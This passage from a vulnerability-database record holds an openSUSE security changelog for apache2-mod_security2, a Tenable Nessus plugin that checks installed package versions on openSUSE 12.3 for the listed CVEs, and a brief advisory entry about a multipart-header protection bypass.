2.2.8-0-g0f07cbb.\n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintained upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. 
(Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)", "edition": 21, "published": "2014-06-13T00:00:00", "title": "openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1331-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-2751", "CVE-2009-5031", "CVE-2012-4528", "CVE-2013-2765", "CVE-2013-1915"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource", "cpe:/o:novell:opensuse:12.3", "p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo", "p-cpe:/a:novell:opensuse:apache2-mod_security2"], "id": "OPENSUSE-2013-641.NASL", "href": "https://www.tenable.com/plugins/nessus/75113", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2013-641.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(75113);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-5031\", \"CVE-2012-2751\", \"CVE-2012-4528\", \"CVE-2013-1915\", \"CVE-2013-2765\");\n\n script_name(english:\"openSUSE Security Update : apache2-mod_security2 (openSUSE-SU-2013:1331-1)\");\n script_summary(english:\"Check for the openSUSE-2013-641 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - complete overhaul of this package, with update to 2.7.5.\n\n - ruleset update 
to 2.2.8-0-g0f07cbb.\n\n - new configuration framework private to mod_security2:\n /etc/apache2/conf.d/mod_security2.conf loads\n /usr/share/apache2-mod_security2/rules/modsecurity_crs_1\n 0_setup.conf, then /etc/apache2/mod_security2.d/*.conf ,\n as set up based on advice in\n /etc/apache2/conf.d/mod_security2.conf Your\n configuration starting point is\n /etc/apache2/conf.d/mod_security2.conf\n\n - !!! Please note that mod_unique_id is needed for\n mod_security2 to run!\n\n - modsecurity-apache_2.7.5-build_fix_pcre.diff changes\n erroneaous linker parameter, preventing rpath in shared\n object.\n\n - fixes contained for the following bugs :\n\n - CVE-2009-5031, CVE-2012-2751 [bnc#768293] request\n parameter handling\n\n - [bnc#768293] multi-part bypass, minor threat\n\n - CVE-2013-1915 [bnc#813190] XML external entity\n vulnerability\n\n - CVE-2012-4528 [bnc#789393] rule bypass\n\n - CVE-2013-2765 [bnc#822664] NULL pointer dereference\n crash\n\n - new from 2.5.9 to 2.7.5, only major changes :\n\n - GPLv2 replaced by Apache License v2\n\n - rules are not part of the source tarball any longer, but\n maintaned upstream externally, and included in this\n package.\n\n - documentation was externalized to a wiki. Package\n contains the FAQ and the reference manual in html form.\n\n - renamed the term 'Encryption' in directives that\n actually refer to hashes. See CHANGES file for more\n details.\n\n - new directive SecXmlExternalEntity, default off\n\n - byte conversion issues on s390x when logging fixed.\n\n - many small issues fixed that were discovered by a\n Coverity scanner\n\n - updated reference manual\n\n - wrong time calculation when logging for some timezones\n fixed.\n\n - replaced time-measuring mechanism with finer granularity\n for measured request/answer phases. 
(Stopwatch remains\n for compat.)\n\n - cookie parser memory leak fix\n\n - parsing of quoted strings in multipart\n Content-Disposition headers fixed.\n\n - SDBM deadlock fix\n\n - @rsub memory leak fix\n\n - cookie separator code improvements\n\n - build failure fixes\n\n - compile time option --enable-htaccess-config (set)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=768293\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=789393\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=813190\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=822664\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-08/msg00020.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected apache2-mod_security2 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:apache2-mod_security2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_security2-2.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_security2-debuginfo-2.7.5-2.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"apache2-mod_security2-debugsource-2.7.5-2.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache2-mod_security2 / apache2-mod_security2-debuginfo / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:47", "bulletinFamily": "software", "cvelist": ["CVE-2012-2751", "CVE-2012-4528"], 
"description": "It's possible to bypass protection if both Content-Disposition: attachment and Content-Type: multipart are present", "edition": 1, "modified": "2012-07-09T00:00:00", "published": "2012-07-09T00:00:00", "id": "SECURITYVULNS:VULN:12451", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12451", "title": "Apache mod_security protection bypass", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}